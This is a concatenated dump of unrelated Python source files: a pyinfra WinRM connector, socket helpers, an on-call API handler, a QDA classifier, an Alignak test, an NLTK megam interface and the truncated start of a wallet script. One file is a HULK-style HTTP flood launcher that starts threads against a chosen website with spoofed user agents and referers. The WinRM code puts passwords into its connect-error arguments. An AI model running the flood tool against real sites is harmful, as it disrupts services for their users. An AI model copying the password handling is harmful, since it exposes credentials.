Returns the winrm Session if successful.\n \'\'\'\n\n kwargs = _make_winrm_kwargs(state, host)\n logger.debug(\'Connecting to: %s (%s)\', host.name, kwargs)\n\n # Hostname can be provided via winrm config (alias), data, or the hosts name\n hostname = kwargs.pop(\n \'hostname\',\n host.data.winrm_hostname or host.name,\n )\n\n try:\n # Create new session\n host_and_port = \'{}:{}\'.format(hostname, host.data.winrm_port)\n logger.debug(\'host_and_port: %s\', host_and_port)\n\n session = PyinfraWinrmSession(\n host_and_port,\n auth=(\n kwargs[\'username\'],\n kwargs[\'password\'],\n ),\n transport=kwargs[\'winrm_transport\'],\n read_timeout_sec=kwargs[\'winrm_read_timeout_sec\'],\n operation_timeout_sec=kwargs[\'winrm_operation_timeout_sec\'],\n )\n\n return session\n\n # TODO: add exceptions here\n except Exception as e:\n auth_kwargs = {}\n\n for key, value in kwargs.items():\n if key in (\'username\', \'password\'):\n auth_kwargs[key] = value\n\n auth_args = \', \'.join(\n \'{0}={1}\'.format(key, value)\n for key, value in auth_kwargs.items()\n )\n logger.debug(\'%s\', e)\n _raise_connect_error(host, \'Authentication error\', auth_args)\n\n\ndef run_shell_command(\n state, host, command,\n env=None,\n success_exit_codes=None,\n print_output=False,\n print_input=False,\n return_combined_output=False,\n shell_executable=Config.SHELL,\n **ignored_command_kwargs\n):\n \'\'\'\n Execute a command on the specified host.\n\n Args:\n state (``pyinfra.api.State`` obj): state object for this command\n hostname (string): hostname of the target\n command (string): actual command to execute\n success_exit_codes (list): all values in the list that will return success\n print_output (boolean): print the output\n print_intput (boolean): print the input\n return_combined_output (boolean): combine the stdout and stderr lists\n shell_executable (string): shell to use - \'cmd\'=cmd, \'ps\'=powershell(default)\n env (dict): environment variables to set\n\n Returns:\n tuple: (exit_code, stdout, stderr)\n stdout and stderr are both lists of strings from each buffer.\n \'\'\'\n\n command = make_win_command(command)\n\n logger.debug(\'Running command on %s: %s\', host.name, command)\n\n if print_input:\n click.echo(\'{0}>>> {1}\'.format(host.print_prefix, command), err=True)\n\n # get rid of leading/trailing quote\n tmp_command = command.strip(""\'"")\n\n if print_output:\n click.echo(\n \'{0}>>> {1}\'.format(host.print_prefix, command),\n err=True,\n )\n\n if not shell_executable:\n shell_executable = \'ps\'\n logger.debug(\'shell_executable:%s\', shell_executable)\n\n # we use our own subclassed session that allows for env setting from open_shell.\n if shell_executable in [\'cmd\']:\n response = host.connection.run_cmd(tmp_command, env=env)\n else:\n response = host.connection.run_ps(tmp_command, env=env)\n\n return_code = response.status_code\n logger.debug(\'response:%s\', response)\n\n std_out_str = response.std_out.decode(\'utf-8\')\n std_err_str = response.std_err.decode(\'utf-8\')\n\n # split on \'\\r\\n\' (windows newlines)\n std_out = std_out_str.split(\'\\r\\n\')\n std_err = std_err_str.split(\'\\r\\n\')\n\n logger.debug(\'std_out:%s\', std_out)\n logger.debug(\'std_err:%s\', std_err)\n\n if print_output:\n click.echo(\n \'{0}>>> {1}\'.format(host.print_prefix, \'\\n\'.join(std_out)),\n err=True,\n )\n\n if success_exit_codes:\n status = return_code in success_exit_codes\n else:\n status = return_code == 0\n\n logger.debug(\'Command exit status: %s\', status)\n\n if return_combined_output:\n std_out = 
[(\'stdout\', line) for line in std_out]\n std_err = [(\'stderr\', line) for line in std_err]\n return status, std_out + std_err\n\n return status, std_out, std_err\n\n\ndef get_file(\n state, host, remote_filename, filename_or_io,\n **command_kwargs\n):\n raise PyinfraError(\'Not implemented\')\n\n\ndef _put_file(state, host, filename_or_io, remote_location, chunk_size=2048):\n # this should work fine on smallish files, but there will be perf issues\n # on larger files both due to the full read, the base64 encoding, and\n # the latency when sending chunks\n with get_file_io(filename_or_io) as file_io:\n data = file_io.read()\n for i in range(0, len(data), chunk_size):\n chunk = data[i:i + chunk_size]\n ps = (\n \'$data = [System.Convert]::FromBase64String(""{0}""); \'\n \'{1} -Value $data -Encoding byte -Path ""{2}""\'\n ).format(\n base64.b64encode(chunk).decode(\'utf-8\'),\n \'Set-Content\' if i == 0 else \'Add-Content\',\n remote_location)\n status, _stdout, stderr = run_shell_command(state, host, ps)\n if status is False:\n logger.error(\'File upload error: {0}\'.format(\'\\n\'.join(stderr)))\n return False\n\n return True\n\n\ndef put_file(\n state, host, filename_or_io, remote_filename,\n print_output=False, print_input=False,\n **command_kwargs\n):\n \'\'\'\n Upload file by chunking and sending base64 encoded via winrm\n \'\'\'\n\n # Always use temp file here in case of failure\n temp_file = ntpath.join(\n host.fact.windows_temp_dir(),\n \'pyinfra-{0}\'.format(sha1_hash(remote_filename)),\n )\n\n if not _put_file(state, host, filename_or_io, temp_file):\n return False\n\n # Execute run_shell_command w/sudo and/or su_user\n command = \'Move-Item -Path {0} -Destination {1} -Force\'.format(temp_file, remote_filename)\n status, _, stderr = run_shell_command(\n state, host, command,\n print_output=print_output,\n print_input=print_input,\n **command_kwargs\n )\n\n if status is False:\n logger.error(\'File upload error: {0}\'.format(\'\\n\'.join(stderr)))\n return False\n\n if print_output:\n click.echo(\n \'{0}file uploaded: {1}\'.format(host.print_prefix, remote_filename),\n err=True,\n )\n\n return True\n\n\nEXECUTION_CONNECTOR = True\n', '#\n# (C) Copyright 2011 Jacek Konieczny dummy@email.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License Version\n# 2.1 as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
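# _put_file above streams a file as base64 chunks, using Set-Content for the
# first chunk and Add-Content for the rest. The chunking itself is plain
# Python; a minimal sketch under the same 2048-byte default:
import base64

def b64_chunks(data, chunk_size=2048):
    for i in range(0, len(data), chunk_size):
        # first=True tells the caller to create the file rather than append
        yield i == 0, base64.b64encode(data[i:i + chunk_size]).decode("utf-8")

chunks = list(b64_chunks(b"x" * 5000))
assert len(chunks) == 3 and chunks[0][0] and not chunks[1][0]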
See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n#\n# pylint: disable-msg=W0201\n\n""""""Utility functions to wait until a socket (or object implementing .fileno()\nin POSIX) is ready for input or output.""""""\n\nfrom __future__ import absolute_import, division\n\n__docformat__ = ""restructuredtext en""\n\nimport select\n\nif hasattr(select, ""poll""):\n def wait_for_read(socket, timeout = None):\n """"""Wait up to `timeout` seconds until `socket` is ready for reading.\n """"""\n if timeout is not None:\n timeout *= 1000\n poll = select.poll()\n poll.register(socket, select.POLLIN)\n events = poll.poll(timeout)\n return bool(events)\n def wait_for_write(socket, timeout = None):\n """"""Wait up to `timeout` seconds until `socket` is ready for writing.\n """"""\n if timeout is not None:\n timeout *= 1000\n poll = select.poll()\n poll.register(socket, select.POLLOUT)\n events = poll.poll(timeout)\n return bool(events)\nelse:\n def wait_for_read(socket, timeout = None):\n """"""Wait up to `timeout` seconds until `socket` is ready for reading.\n """"""\n readable = select.select([socket], [], [], timeout)[0]\n return bool(readable)\n def wait_for_write(socket, timeout = None):\n """"""Wait up to `timeout` seconds until `socket` is ready for writing.\n """"""\n writable = select.select([], [socket], [], timeout)[1]\n return bool(writable)\n\n', '""""""\r\nHTTP UNBEARBALE LOAD QUEEN\r\nA HULK EDIT BY @OBN0XIOUS\r\nTHE ORIGINAL MAKER OF HULK PLEASE GO BACK TO CODECADEMY\r\n""""""\r\n\r\nimport sys\r\nimport argparse\r\nimport random\r\nfrom threading import Thread\r\n\r\nimport hulqThreading\r\nimport hulqRequest\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\'--threads\', \'-t\', default=2, help=\'Choose how many threads.\')\r\nparser.add_argument(\'--website\', \'-w\', help=\'Website you are attacking.\')\r\nsystemArguments = parser.parse_args()\r\n\r\nif not systemArguments.website:\r\n\tsys.exit(""Provide -w or --website."")\r\n\r\nuserAgents = \\\r\n\t(\r\n\t\'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:127.0.0.1 Gecko/20090913 Firefox/3.5.3\', \\\r\n\t\'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729\', \\\r\n\t\'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729\', \\\r\n\t\'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:127.0.0.1 Gecko/20090718 Firefox/3.5.1\', \\\r\n\t\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US AppleWebKit/532.1 (KHTML, \\ like Gecko Chrome/4.0.219.6 Safari/532.1\', \\\r\n\t\'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2\', \\\r\n\t\'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729\', \\\r\n\t\'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0\', \\\r\n\t\'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2\', \\\r\n\t\'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US\', \\\r\n\t\'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP\', \\\r\n\t\'Opera/9.80 (Windows NT 5.2; U; ru Presto/2.5.22 Version/10.51\'\t\r\n\t)\r\n\r\n\r\nreferers = 
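# The wait_for_read/wait_for_write helpers below pick poll() when the platform
# provides it and fall back to select(); both return a bare bool. A short
# usage sketch with a local socket pair (socket.socketpair is available on
# POSIX and on Python 3 generally), using the select() fallback form:
import socket, select

def wait_for_read(sock, timeout=None):
    return bool(select.select([sock], [], [], timeout)[0])

a, b = socket.socketpair()
assert wait_for_read(a, timeout=0) is False   # nothing buffered yet
b.send(b"ping")
assert wait_for_read(a, timeout=1.0) is True  # data is now readable
a.close(); b.close()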
\\\r\n\t(\r\n\t\t\'http://www.google.com/?q=\', \\\r\n\t\t\'http://www.usatoday.com/search/results?q=\', \\\r\n\t\t\'http://engadget.search.aol.com/search?q=\'\r\n\t\t)\r\n\r\n\r\n\r\nfor i in range(0, int(systemArguments.threads)):\r\n\treferer = random.choice(referers)\r\n\tuserAgent = random.choice(userAgents)\r\n\tt1 = Thread(target = hulqRequest.httpAttackRequest, args = (systemArguments.website, userAgent, referer))\r\n\tt1.start()\r\n', '# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.\n# See LICENSE in the project root for license information.\nimport json\nimport time\nfrom .events import on_get as get_events\nfrom collections import defaultdict\nimport requests\nfrom ujson import dumps as json_dumps\nfrom falcon import HTTPStatus, HTTP_200\n\n\nclass PaidEvents(object):\n def __init__(self, config):\n self.config = config\n\n def on_get(self, req, resp):\n """"""\n Search for events. Allows filtering based on a number of parameters,\n detailed below. Also returns only the users who are paid to be on call. Uses response from\n oncall-bonus to identify paid status.\n\n **Example request**:\n\n .. sourcecode:: http\n\n GET /api/v0/oncall_events?team=foo-sre&end__gt=1487466146&role=primary HTTP/1.1\n Host: example.com\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n\n {\n ""ldap_user_id"":\n [\n {\n ""start"": 1488441600,\n ""end"": 1489132800,\n ""team"": ""foo-sre"",\n ""link_id"": null,\n ""schedule_id"": null,\n ""role"": ""primary"",\n ""user"": ""foo"",\n ""full_name"": ""Foo Icecream"",\n ""id"": 187795\n },\n {\n ""start"": 1488441600,\n ""end"": 1489132800,\n ""team"": ""foo-sre"",\n ""link_id"": ""PI:KEY"",\n ""schedule_id"": 123,\n ""role"": ""primary"",\n ""user"": ""bar"",\n ""full_name"": ""Bar Apple"",\n ""id"": 187795\n }\n ]\n ]\n\n :query team: team name\n :query user: user name\n :query role: role name\n :query id: id of the event\n :query start: start time (unix timestamp) of event\n :query end: end time (unix timestamp) of event\n :query start__gt: start time (unix timestamp) greater than\n :query start__ge: start time (unix timestamp) greater than or equal\n :query start__lt: start time (unix timestamp) less than\n :query start__le: start time (unix timestamp) less than or equal\n :query end__gt: end time (unix timestamp) greater than\n :query end__ge: end time (unix timestamp) greater than or equal\n :query end__lt: end time (unix timestamp) less than\n :query end__le: end time (unix timestamp) less than or equal\n :query role__eq: role name\n :query role__contains: role name contains param\n :query role__startswith: role name starts with param\n :query role__endswith: role name ends with param\n :query team__eq: team name\n :query team__contains: team name contains param\n :query team__startswith: team name starts with param\n :query team__endswith: team name ends with param\n :query team_id: team id\n :query user__eq: user name\n :query user__contains: user name contains param\n :query user__startswith: user name starts with param\n :query user__endswith: user name ends with param\n\n :statuscode 200: no error\n :statuscode 400: bad request\n """"""\n\n config = self.config\n oncall_bonus_blacklist = config.get(\'bonus_blacklist\', [])\n oncall_bonus_whitelist = config.get(\'bonus_whitelist\', [])\n bonus_url = config.get(\'bonus_url\', None)\n ldap_grouping = defaultdict(list)\n\n # if start time is not specified only fetch events in the future\n if 
not req.params.get(\'start__gt\'):\n req.params[\'start__gt\'] = str(int(time.time()))\n\n get_events(req, resp)\n\n # fetch team data from an externall oncall-bonus api\n try:\n bonus_response = requests.get(bonus_url)\n bonus_response.raise_for_status()\n except requests.exceptions.RequestException:\n raise HTTPStatus(\'503 failed to contact oncall-bonus API\')\n\n oncall_bonus_teams = bonus_response.json()\n\n for event in json.loads(resp.body):\n if event[\'role\'].lower() == \'manager\':\n continue\n\n team = event[\'team\']\n if team in oncall_bonus_whitelist:\n ldap_grouping[event[\'user\']].append(event)\n continue\n if team in oncall_bonus_blacklist:\n continue\n\n # check if event\'s role is payed for that team\n team_payment_details = next((item for item in oncall_bonus_teams if item.get(\'name\', \'\') == team), None)\n if team_payment_details:\n team_payed_roles = {\'primary\': team_payment_details.get(\'primary_paid\', 0), \'secondary\': team_payment_details.get(\'secondary_paid\', 0)}\n if team_payed_roles.get(event[\'role\']):\n ldap_grouping[event[\'user\']].append(event)\n\n resp.status = HTTP_200\n resp.body = json_dumps(ldap_grouping)\n', '""""""\nQuadratic Discriminant Analysis\n""""""\n\n# Author: Matthieu Perrot dummy@email.com\n#\n# License: BSD Style.\n\nimport warnings\n\nimport numpy as np\nimport scipy.ndimage as ndimage\n\nfrom .base import BaseEstimator, ClassifierMixin\n\n\n# FIXME :\n# - in fit(X, y) method, many checks are common with other models\n# (in particular LDA model) and should be factorized:\n# maybe in BaseEstimator ?\n\nclass QDA(BaseEstimator, ClassifierMixin):\n """"""\n Quadratic Discriminant Analysis (QDA)\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Training vector, where n_samples in the number of samples and\n n_features is the number of features.\n y : array, shape = [n_samples]\n Target vector relative to X\n\n priors : array, optional, shape = [n_classes]\n Priors on classes\n\n Attributes\n ----------\n `means_` : array-like, shape = [n_classes, n_features]\n Class means\n `priors_` : array-like, shape = [n_classes]\n Class priors (sum to 1)\n `covariances_` : list of array-like, shape = [n_features, n_features]\n Covariance matrices of each class\n\n Examples\n --------\n >>> from sklearn.qda import QDA\n >>> import numpy as np\n >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])\n >>> y = np.array([1, 1, 1, 2, 2, 2])\n >>> clf = QDA()\n >>> clf.fit(X, y)\n QDA(priors=None)\n >>> print clf.predict([[-0.8, -1]])\n [1]\n\n See also\n --------\n LDA\n """"""\n\n def __init__(self, priors=None):\n self.priors = np.asarray(priors) if priors is not None else None\n\n def fit(self, X, y, store_covariances=False, tol=1.0e-4):\n """"""\n Fit the QDA model according to the given training data and parameters.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Training vector, where n_samples in the number of samples and\n n_features is the number of features.\n y : array, shape = [n_samples]\n Target values (integers)\n store_covariances : boolean\n If True the covariance matrices are computed and stored in the\n self.covariances_ attribute.\n """"""\n X = np.asarray(X)\n y = np.asarray(y)\n if X.ndim != 2:\n raise ValueError(\'X must be a 2D array\')\n if X.shape[0] != y.shape[0]:\n raise ValueError(\n \'Incompatible shapes: X has %s samples, while y \'\n \'has %s\' % (X.shape[0], y.shape[0]))\n if y.dtype.char.lower() not in (\'b\', \'h\', \'i\'):\n # We 
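# The paid-event filter above reduces to one predicate per (team, role) pair:
# the whitelist wins, the blacklist (and the manager role) drops, and otherwise
# the oncall-bonus record decides. A minimal sketch of that decision, with data
# shapes assumed from the handler code above:
def is_paid(team, role, whitelist, blacklist, bonus_teams):
    if team in whitelist:
        return True
    if team in blacklist or role == "manager":
        return False
    details = next((t for t in bonus_teams if t.get("name") == team), None)
    if not details:
        return False
    paid = {"primary": details.get("primary_paid", 0),
            "secondary": details.get("secondary_paid", 0)}
    return bool(paid.get(role))

assert is_paid("foo-sre", "primary", (), (), [{"name": "foo-sre", "primary_paid": 1}])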
need integer values to be able to use\n # ndimage.measurements and np.bincount on numpy >= 2.0.\n # We currently support (u)int8, (u)int16 and (u)int32.\n # Note that versions of scipy >= 0.8 can also accept\n # (u)int64. We however don\'t support it for backwards\n # compatibility.\n y = y.astype(np.int32)\n n_samples, n_features = X.shape\n classes = np.unique(y)\n n_classes = classes.size\n if n_classes < 2:\n raise ValueError(\'y has less than 2 classes\')\n classes_indices = [(y == c).ravel() for c in classes]\n if self.priors is None:\n counts = np.array(ndimage.measurements.sum(\n np.ones(n_samples, dtype=y.dtype), y, index=classes))\n self.priors_ = counts / float(n_samples)\n else:\n self.priors_ = self.priors\n\n cov = None\n if store_covariances:\n cov = []\n means = []\n scalings = []\n rotations = []\n for group_indices in classes_indices:\n Xg = X[group_indices, :]\n meang = Xg.mean(0)\n means.append(meang)\n Xgc = Xg - meang\n # Xgc = U * S * V.T\n U, S, Vt = np.linalg.svd(Xgc, full_matrices=False)\n rank = np.sum(S > tol)\n if rank < n_features:\n warnings.warn(""Variables are collinear"")\n S2 = (S ** 2) / (len(Xg) - 1)\n if store_covariances:\n # cov = V * (S^2 / (n-1)) * V.T\n cov.append(np.dot(S2 * Vt.T, Vt))\n scalings.append(S2)\n rotations.append(Vt.T)\n if store_covariances:\n self.covariances_ = cov\n self.means_ = np.asarray(means)\n self.scalings = np.asarray(scalings)\n self.rotations = rotations\n self.classes = classes\n return self\n\n def decision_function(self, X):\n """"""Apply decision function to an array of samples.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Array of samples (test vectors).\n\n Returns\n -------\n C : array, shape = [n_samples, n_classes]\n Decision function values related to each class, per sample.\n """"""\n X = np.asarray(X)\n norm2 = []\n for i in range(len(self.classes)):\n R = self.rotations[i]\n S = self.scalings[i]\n Xm = X - self.means_[i]\n X2 = np.dot(Xm, R * (S ** (-0.5)))\n norm2.append(np.sum(X2 ** 2, 1))\n norm2 = np.array(norm2).T # shape = [len(X), n_classes]\n return (-0.5 * (norm2 + np.sum(np.log(self.scalings), 1))\n + np.log(self.priors_))\n\n def predict(self, X):\n """"""Perform classification on an array of test vectors X.\n\n The predicted class C for each sample in X is returned.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n\n Returns\n -------\n C : array, shape = [n_samples]\n """"""\n d = self.decision_function(X)\n y_pred = self.classes[d.argmax(1)]\n return y_pred\n\n def predict_proba(self, X):\n """"""Return posterior probabilities of classification.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Array of samples/test vectors.\n\n Returns\n -------\n C : array, shape = [n_samples, n_classes]\n Posterior probabilities of classification per class.\n """"""\n values = self.decision_function(X)\n # compute the likelihood of the underlying gaussian models\n # up to a multiplicative constant.\n likelihood = np.exp(values - values.min(axis=1)[:, np.newaxis])\n # compute posterior probabilities\n return likelihood / likelihood.sum(axis=1)[:, np.newaxis]\n\n def predict_log_proba(self, X):\n """"""Return posterior probabilities of classification.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Array of samples/test vectors.\n\n Returns\n -------\n C : array, shape = [n_samples, n_classes]\n Posterior log-probabilities of classification per class.\n """"""\n # XXX : can do better 
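# One standard way to "do better" in predict_log_proba is to stay in log space
# with the log-sum-exp trick instead of exponentiating and re-normalizing.
# A sketch (NumPy only; this is not the estimator's actual code path):
import numpy as np

def log_softmax(values):
    """Row-wise log posterior from unnormalized log-likelihoods."""
    shifted = values - values.max(axis=1, keepdims=True)   # avoids overflow
    return shifted - np.log(np.exp(shifted).sum(axis=1, keepdims=True))

v = np.array([[1000.0, 1001.0]])   # naive np.exp(v) would overflow to inf
np.testing.assert_allclose(np.exp(log_softmax(v)).sum(axis=1), [1.0])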
to avoid precision overflows\n probas_ = self.predict_proba(X)\n return np.log(probas_)\n', '#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors\n#\n# This file is part of Alignak.\n#\n# Alignak is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Alignak is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with Alignak. If not, see .\n#\n#\n# This file incorporates work covered by the following copyright and\n# permission notice:\n#\n# Copyright (C) 2009-2014:\n# Jean Gabes, dummy@email.com\n# Hartmut Goebel, dummy@email.com\n# Grégory Starck, dummy@email.com\n# Zoran Zaric, dummy@email.com\n# Sebastien Coavoux, dummy@email.com\n\n# This file is part of Shinken.\n#\n# Shinken is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Shinken is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with Shinken. If not, see .\n\n#\n# This file is used to test reading and processing of config files\n#\n\nfrom alignak_test import *\n\n\nclass TestConfig(AlignakTest):\n def setUp(self):\n self.setup_with_file(\'etc/alignak_resultmodulation.cfg\')\n\n def get_svc(self):\n return self.sched.services.find_srv_by_name_and_hostname(""test_host_0"", ""test_ok_0"")\n\n def get_host(self):\n return self.sched.hosts.find_by_name(""test_host_0"")\n\n def get_router(self):\n return self.sched.hosts.find_by_name(""test_router_0"")\n\n def test_service_resultmodulation(self):\n svc = self.get_svc()\n host = self.get_host()\n router = self.get_router()\n\n self.scheduler_loop(2, [[host, 0, \'UP | value1=1 value2=2\'], [svc, 2, \'BAD | value1=0 value2=0\'],])\n self.assertEqual(\'UP\', host.state)\n self.assertEqual(\'HARD\', host.state_type)\n\n # This service got a result modulation. So Criticals are in fact\n # Warnings. So even with some CRITICAL (2), it must be warning\n self.assertEqual(\'WARNING\', svc.state)\n\n # If we remove the resultmodulations, we should have theclassic behavior\n svc.resultmodulations = []\n self.scheduler_loop(2, [[host, 0, \'UP | value1=1 value2=2\'], [svc, 2, \'BAD | value1=0 value2=0\']])\n self.assertEqual(\'CRITICAL\', svc.state)\n\n # Now look for the inheritaed thing\n # resultmodulation is a inplicit inherited parameter\n # and router define it, but not test_router_0/test_ok_0. 
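# A result modulation is essentially a state-remapping table applied before the
# scheduler records the check result. A toy sketch of the behaviour this test
# exercises (CRITICAL demoted to WARNING; names are illustrative, not Alignak's
# internals):
STATE_MAP = {2: 1}                  # exit code 2 (CRITICAL) -> 1 (WARNING)

def modulate(exit_code, modulations):
    for mapping in modulations:
        exit_code = mapping.get(exit_code, exit_code)
    return exit_code

assert modulate(2, [STATE_MAP]) == 1   # modulated service ends up WARNING
assert modulate(2, []) == 2            # without modulations: CRITICAL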
So this service should also be impacted\n svc2 = self.sched.services.find_srv_by_name_and_hostname(""test_router_0"", ""test_ok_0"")\n self.assertEqual(router.resultmodulations, svc2.resultmodulations)\n\n self.scheduler_loop(2, [[svc2, 2, \'BAD | value1=0 value2=0\']])\n self.assertEqual(\'WARNING\', svc2.state)\n\n\nif __name__ == \'__main__\':\n unittest.main()\n', '# Natural Language Toolkit: Interface to Megam Classifier\n#\n# Copyright (C) 2001-2010 NLTK Project\n# Author: Edward Loper dummy@email.com\n# URL: \n# For license information, see LICENSE.TXT\n#\n# $Id: naivebayes.py 2063 2004-07-17 21:02:24Z edloper $\n\n""""""\nA set of functions used to interface with the external U{megam\n} maxent optimization package.\nBefore C{megam} can be used, you should tell NLTK where it can find\nthe C{megam} binary, using the L{config_megam()} function. Typical\nusage:\n\n >>> import nltk\n >>> nltk.config_megam(\'.../path/to/megam\')\n >>> classifier = nltk.MaxentClassifier.train(corpus, \'megam\')\n\n""""""\n__docformat__ = \'epytext en\'\n\nimport os\nimport os.path\nimport subprocess\n\nfrom nltk.internals import find_binary\ntry:\n import numpy\nexcept ImportError:\n numpy = None\n\n######################################################################\n#{ Configuration\n######################################################################\n\n_megam_bin = None\ndef config_megam(bin=None):\n """"""\n Configure NLTK\'s interface to the C{megam} maxent optimization\n package.\n\n @param bin: The full path to the C{megam} binary. If not specified,\n then nltk will search the system for a C{megam} binary; and if\n one is not found, it will raise a C{LookupError} exception.\n @type bin: C{string}\n """"""\n global _megam_bin\n _megam_bin = find_binary(\n \'megam\', bin,\n env_vars=[\'MEGAM\', \'MEGAMHOME\'],\n binary_names=[\'megam.opt\', \'megam\', \'megam_686\', \'megam_i686.opt\'],\n url=\'http://www.cs.utah.edu/~hal/megam/\')\n\n######################################################################\n#{ Megam Interface Functions\n######################################################################\n\ndef write_megam_file(train_toks, encoding, stream,\n bernoulli=True, explicit=True):\n """"""\n Generate an input file for C{megam} based on the given corpus of\n classified tokens.\n\n @type train_toks: C{list} of C{tuples} of (C{dict}, C{str})\n @param train_toks: Training data, represented as a list of\n pairs, the first member of which is a feature dictionary,\n and the second of which is a classification label.\n\n @type encoding: L{MaxentFeatureEncodingI}\n @param encoding: A feature encoding, used to convert featuresets\n into feature vectors.\n\n @type stream: C{stream}\n @param stream: The stream to which the megam input file should be\n written.\n\n @param bernoulli: If true, then use the \'bernoulli\' format. I.e.,\n all joint features have binary values, and are listed iff they\n are true. Otherwise, list feature values explicitly. If\n C{bernoulli=False}, then you must call C{megam} with the\n C{-fvals} option.\n\n @param explicit: If true, then use the \'explicit\' format. I.e.,\n list the features that would fire for any of the possible\n labels, for each token. 
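# Concretely, write_megam_file below turns one training instance into one line:
# the label's index, then (in explicit mode) a '#'-separated feature list per
# candidate label. A sketch of the bernoulli+explicit encoding for a two-label
# problem (feature ids invented for illustration):
def megam_line(label_index, features_per_label):
    parts = ["%d" % label_index]
    for fired in features_per_label:        # one fired-feature list per label
        parts.append("# " + " ".join(fired))
    return " ".join(parts)

line = megam_line(0, [["w=hello", "bias"], ["bias"]])
assert line == "0 # w=hello bias # bias"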
If C{explicit=True}, then you must\n call C{megam} with the C{-explicit} option.\n """"""\n # Look up the set of labels.\n labels = encoding.labels()\n labelnum = dict([(label, i) for (i, label) in enumerate(labels)])\n\n # Write the file, which contains one line per instance.\n for featureset, label in train_toks:\n # First, the instance number.\n stream.write(\'%d\' % labelnum[label])\n\n # For implicit file formats, just list the features that fire\n # for this instance\'s actual label.\n if not explicit:\n _write_megam_features(encoding.encode(featureset, label),\n stream, bernoulli)\n\n # For explicit formats, list the features that would fire for\n # any of the possible labels.\n else:\n for l in labels:\n stream.write(\' #\')\n _write_megam_features(encoding.encode(featureset, l),\n stream, bernoulli)\n\n # End of the isntance.\n stream.write(\'\\n\')\n\ndef parse_megam_weights(s, features_count, explicit=True):\n """"""\n Given the stdout output generated by C{megam} when training a\n model, return a C{numpy} array containing the corresponding weight\n vector. This function does not currently handle bias features.\n """"""\n if numpy is None:\n raise ValueError(\'This function requires that numpy be installed\')\n assert explicit, \'non-explicit not supported yet\'\n lines = s.strip().split(\'\\n\')\n weights = numpy.zeros(features_count, \'d\')\n for line in lines:\n if line.strip():\n fid, weight = line.split()\n weights[int(fid)] = float(weight)\n return weights\n\ndef _write_megam_features(vector, stream, bernoulli):\n if not vector:\n raise ValueError(\'MEGAM classifier requires the use of an \'\n \'always-on feature.\')\n for (fid, fval) in vector:\n if bernoulli:\n if fval == 1:\n stream.write(\' %s\' % fid)\n elif fval != 0:\n raise ValueError(\'If bernoulli=True, then all\'\n \'features must be binary.\')\n else:\n stream.write(\' %s %s\' % (fid, fval))\n\ndef call_megam(args):\n """"""\n Call the C{megam} binary with the given arguments.\n """"""\n if isinstance(args, basestring):\n raise TypeError(\'args should be a list of strings\')\n if _megam_bin is None:\n config_megam()\n\n # Call megam via a subprocess\n cmd = [_megam_bin] + args\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n (stdout, stderr) = p.communicate()\n\n # Check the return code.\n if p.returncode != 0:\n print\n print stderr\n raise OSError(\'megam command failed!\')\n\n return stdout\n\n', '#!/usr/bin/env python\n#\n# Use the raw transactions API to spend ones received on particular addresses,\n# and send any change back to that same address.\n#\n# Example usage:\n# spendfrom.py # Lists available funds\n# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00\n#\n# Assumes it will talk to a oned or One-Qt running\n# on localhost.\n#\n# Depends on jsonrpc\n#\n\nfrom decimal import *\nimport getpass\nimport math\nimport os\nimport os.path\nimport platform\nimport sys\nimport time\nfrom 